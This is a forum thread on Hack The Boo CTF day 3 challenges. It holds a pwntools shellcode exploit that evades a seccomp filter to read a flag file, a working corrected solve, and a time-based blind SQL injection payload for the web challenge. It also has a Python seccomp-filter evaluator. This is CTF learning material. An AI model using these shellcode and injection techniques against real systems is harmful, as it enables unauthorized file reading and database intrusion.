[Hack The Boo] Day 3 Challenges
how to solve pwn and web '___'
Reply
(October 24, 2022, 02:12 PM)Meep Wrote: Pwn challenge looks like shellcode.
  local_a8 = 0;
  local_a0 = 0;
  local_98 = 0;
  local_90 = 0;
  local_88 = 0;
  local_80 = 0;
  local_78 = 0;
  local_70 = 0;
  local_68 = 0;
  local_60 = 0;
  local_58 = 0;
  local_50 = 0;
  local_48 = 0;
  local_40 = 0;
  local_38 = 0;
  local_30 = 0;
  local_28 = 0;
  local_20 = 0;
  local_18 = 0;
  local_14 = 0;
  read(0,&local_a8,0x95);
  (*(code *)&local_a8)();

Also NX is not set, meaning it's capable of it (no protection). Did not get it working yet.

any update for pwn?
Reply
3 days challenges plz give it a rest
Reply
very nice
Reply
(October 24, 2022, 01:50 PM)Hacker2222 Wrote: plz discuss here


reversing challenge:
thanks @HTBContestant


Well, thanks for sharing Hack The Boo. I've been using HTB since 2020; this one is perfect.
no not me, please check it here
Reply
(October 24, 2022, 01:50 PM)Hacker2222 Wrote: plz discuss here


reversing challenge:
thanks @HTBContestant


thank you
Reply
On web, why am I getting

{"message":"400 Bad Request"},


How do you guys append the payload to the JSON body?

Example (just an example):


{
"username":"admin"="admin" AND (SELECT 5424 FROM (SELECT(SLEEP(5)))OChx) AND "admin"="admin",
"password":"admin"
}
Reply
thxxxxx
Reply
(October 25, 2022, 02:34 AM)karhu Wrote: Still working on PWN. What I have so far:

Output from seccomp-tools dump ./pumpking
 line  CODE  JT   JF      K
=================================
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
0005: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0010
0006: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0010
0007: 0x15 0x02 0x00 0x0000000f  if (A == rt_sigreturn) goto 0010
0008: 0x15 0x01 0x00 0x0000003c  if (A == exit) goto 0010
0009: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0011
0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
0011: 0x06 0x00 0x00 0x00000000  return KILL


I wrote this using pwntools, but it's not working: 

from pwn import *

context.clear(arch="amd64")


shellcode = shellcraft.linux.openat(-1, "flag.txt")
shellcode1 = shellcraft.linux.read(3, 'rsp', 80)
shellcode2 = shellcraft.linux.write(1, 'rsp', 80)

def main():
    #print(asm(shellcode))
    io = remote("142.93.35.129", 30658)
    io.recvuntil(b"kids: ", timeout=1)
    print(io.recv())
    io.sendline(b"pumpk1ngRulez")
    io.recvuntil(b">> ", timeout=1)
    print(io.recv())
    io.send(asm(shellcode + shellcode1 + shellcode2))
    io.interactive()

if __name__ == "__main__":
    main()


If anyone has any hints, I'd really appreciate it.


Very close, you just needed to play with the file descriptors a bit, it seems like.
#!/usr/bin/python3

from pwn import *

context.update(arch='amd64', os='linux')
shellcode  = shellcraft.linux.openat(-1, "/home/ctf/flag.txt")
shellcode += shellcraft.linux.read(5, 'rsp', 50)
shellcode += shellcraft.linux.write(1, 'rsp', 50)
shellcode += shellcraft.exit(0)
# print(shellcode)

#p = process("./pumpking")
p = remote("127.0.0.1", 1337)
#gdb.attach(p, """
#b * king+261
#c""")

print(p.read())
p.sendline(b"pumpk1ngRulez")
print(p.read())
p.sendline(asm(shellcode))
p.interactive()
Reply
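The seccomp dump karhu posted above can be checked mechanically. This is an added example written for this thread (not karhu's script, the other poster's solve, or seccomp-tools itself): it parses the code/jt/jf/k columns of the dump, evaluates the classic-BPF program for a given arch and syscall number, and lists the syscall numbers the filter allows, confirming that only read, write, rt_sigreturn, exit and openat get through on x86_64 and everything else (other arches, x32 numbers) is killed. The dump text is embedded as constructed sample input copied from the thread.

```python
import re

# The seccomp-tools dump quoted in the thread, embedded here as sample input.
PUMPKING_DUMP = """\
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
0005: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0010
0006: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0010
0007: 0x15 0x02 0x00 0x0000000f  if (A == rt_sigreturn) goto 0010
0008: 0x15 0x01 0x00 0x0000003c  if (A == exit) goto 0010
0009: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0011
0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
0011: 0x06 0x00 0x00 0x00000000  return KILL
"""

AUDIT_ARCH_X86_64 = 0xC000003E  # the arch value the filter compares against
LINE_RE = re.compile(r"^\d+:\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)", re.I)

def parse_dump(text):
    # Keep only the (code, jt, jf, k) columns; the trailing comment is ignored.
    prog = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            prog.append(tuple(int(x, 16) for x in m.groups()))
    return prog

def run_filter(prog, arch, nr):
    # Evaluate the classic-BPF program for one (arch, syscall number) pair.
    pc, acc = 0, 0
    while pc < len(prog):
        code, jt, jf, k = prog[pc]
        if code == 0x20:        # BPF_LD|BPF_W|BPF_ABS: load seccomp_data field at offset k
            acc = {0: nr, 4: arch}[k]   # offset 0 = nr, offset 4 = arch
            pc += 1
        elif code == 0x15:      # BPF_JMP|BPF_JEQ|BPF_K: jt/jf are relative to the next insn
            pc += 1 + (jt if acc == k else jf)
        elif code == 0x35:      # BPF_JMP|BPF_JGE|BPF_K (unsigned compare)
            pc += 1 + (jt if acc >= k else jf)
        elif code == 0x06:      # BPF_RET|BPF_K: 0x7fff0000 is SECCOMP_RET_ALLOW
            return "ALLOW" if k == 0x7FFF0000 else "KILL"
        else:
            raise ValueError(f"unsupported BPF opcode {code:#x}")
    raise ValueError("filter fell off the end of the program")

def allowed_syscalls(prog, arch=AUDIT_ARCH_X86_64, max_nr=0x1FF):
    # Brute-force the syscall number space and collect what the filter lets through.
    return {nr for nr in range(max_nr + 1) if run_filter(prog, arch, nr) == "ALLOW"}
```

Running `sorted(allowed_syscalls(parse_dump(PUMPKING_DUMP)))` gives `[0, 1, 15, 60, 257]`, which is why the solve above can only use openat, read and write and has to get the file descriptor number right.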
(October 24, 2022, 01:50 PM)Hacker2222 Wrote: plz discuss here


reversing challenge:
thanks @HTBContestant

thank you for this share
Reply